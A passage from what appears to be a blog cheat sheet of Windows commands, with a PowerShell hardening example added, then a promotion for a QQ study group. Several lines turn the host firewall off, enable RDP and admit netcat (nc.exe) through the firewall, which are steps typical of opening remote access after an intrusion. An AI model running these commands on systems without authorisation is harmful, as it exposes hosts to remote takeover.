REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(The form REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server ... seen in many cheat sheets is the same command; the quoted space is just a way of avoiding quotes around the whole key path.)

If the connection still fails, it is a firewall problem: either turn the firewall off or allow port 3389 through it.
 Turn off the firewall:
   netsh firewall set opmode disable           (Windows 2003 and earlier)
   netsh advfirewall set allprofiles state off (Vista / 2008 and later)
 Allow port 3389 through the firewall (preferable to turning it off):
   netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Firewall operation

View the firewall configuration: netsh firewall show config
 Set the firewall log file: netsh advfirewall set currentprofile logging filename "C:\Windows\temp\FirewallLOG.log"
Turn off the firewall:
  netsh firewall set opmode disable           (Windows 2003 and earlier)
  netsh advfirewall set allprofiles state off (Vista / 2008 and later)
Allow a program all connections:
  netsh firewall add allowedprogram C:\nc.exe "allow nc" enable   (Windows 2003 and earlier)

Allow inbound connections to a program (dir=in; use dir=out for its outbound connections):
  netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

Open port 3389:
  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
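The netsh lines in this section, the port-139 block in "Ports in Windows" and the RDP enablement above all open or close things on the host firewall. The following is an added example, not part of the original post, doing the same with the NetSecurity cmdlets (Windows 8 / Server 2012 and later) and adding the two controls a defender would insist on: Network Level Authentication stays required, and the RDP rule admits only a management subnet instead of everyone. 10.0.0.0/24 is a placeholder for your own management network; the rule names are my own. Run from an elevated PowerShell.

```powershell
# Added example (not from the original post): firewall and RDP changes done the
# hardened way with the NetSecurity cmdlets.

#Requires -RunAsAdministrator

function Enable-HardenedRdp {
    param([string[]]$AllowedFrom = @('10.0.0.0/24'))
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    # Equivalent of: REG ADD "...\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord
    # Require NLA so unauthenticated clients never reach the logon screen
    Set-ItemProperty -Path "$ts\WinStations\RDP-Tcp" -Name UserAuthentication -Value 1 -Type DWord

    # Keep the firewall on for every profile instead of turning it off
    Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True

    # Replace any earlier rule of the same name so reruns do not stack rules
    Get-NetFirewallRule -DisplayName 'Remote Desktop (restricted)' -ErrorAction SilentlyContinue |
        Remove-NetFirewallRule
    New-NetFirewallRule -DisplayName 'Remote Desktop (restricted)' -Direction Inbound -Protocol TCP `
        -LocalPort 3389 -RemoteAddress $AllowedFrom -Action Allow -Profile Any | Out-Null
}

function Block-InboundPort {
    param([Parameter(Mandatory)][int]$Port, [string]$Protocol = 'TCP')
    # Equivalent of: netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139
    $name = "Block inbound $Protocol/$Port"
    Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue | Remove-NetFirewallRule
    New-NetFirewallRule -DisplayName $name -Direction Inbound -Protocol $Protocol `
        -LocalPort $Port -Action Block -Profile Any | Out-Null
}

function Test-RdpExposure {
    # One row per enabled inbound allow rule on TCP/3389 with the addresses it admits;
    # RemoteAddr "Any" means the port is open to the whole network
    $nla = (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp').UserAuthentication
    Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -eq 3389 } |
        ForEach-Object { $_ | Get-NetFirewallRule } |
        Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' -and $_.Enabled -eq 'True' } |
        ForEach-Object {
            [pscustomobject]@{
                Rule       = $_.DisplayName
                RemoteAddr = (($_ | Get-NetFirewallAddressFilter).RemoteAddress -join ',')
                NLA        = $nla
            }
        }
}

Block-InboundPort -Port 139
Enable-HardenedRdp -AllowedFrom '10.0.0.0/24'
Test-RdpExposure | Format-Table -AutoSize
```

Test-RdpExposure is worth running on its own: the built-in "Remote Desktop" rules created by the GUI or by the netsh line above allow any remote address, which is exactly the exposure that turns an enabled RDP service into an internet-facing brute-force target.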


That is all for this article. Working as a programmer is hard, and so is everyone's job.

I have been learning to write articles since I retired. To be honest, I am very glad to see some readers' responses in the background; I am a beginner and a silly uncle when it comes to self-media... To thank the readers, I want to share some of the programming material I have collected and give something back to every reader. I hope it helps.

The material mainly includes:

① More than 2000 Python e-books (mainstream and classic titles alike)

② Python standard library reference (the most complete Chinese version)

③ Project source code (forty or fifty interesting, classic practice projects)

④ Videos on Python basics, crawlers, web development and big-data analysis (suitable for beginners)

⑤ A summary of all Python knowledge points (covering every direction and technology of Python)

*If it is useful to you, just take it: it is available in my QQ technical exchange group (pure technology, no advertising). The group number is 421592457.*

Keywords: Python Linux Windows

Added by Skittlewidth on Thu, 17 Feb 2022 21:00:11 +0200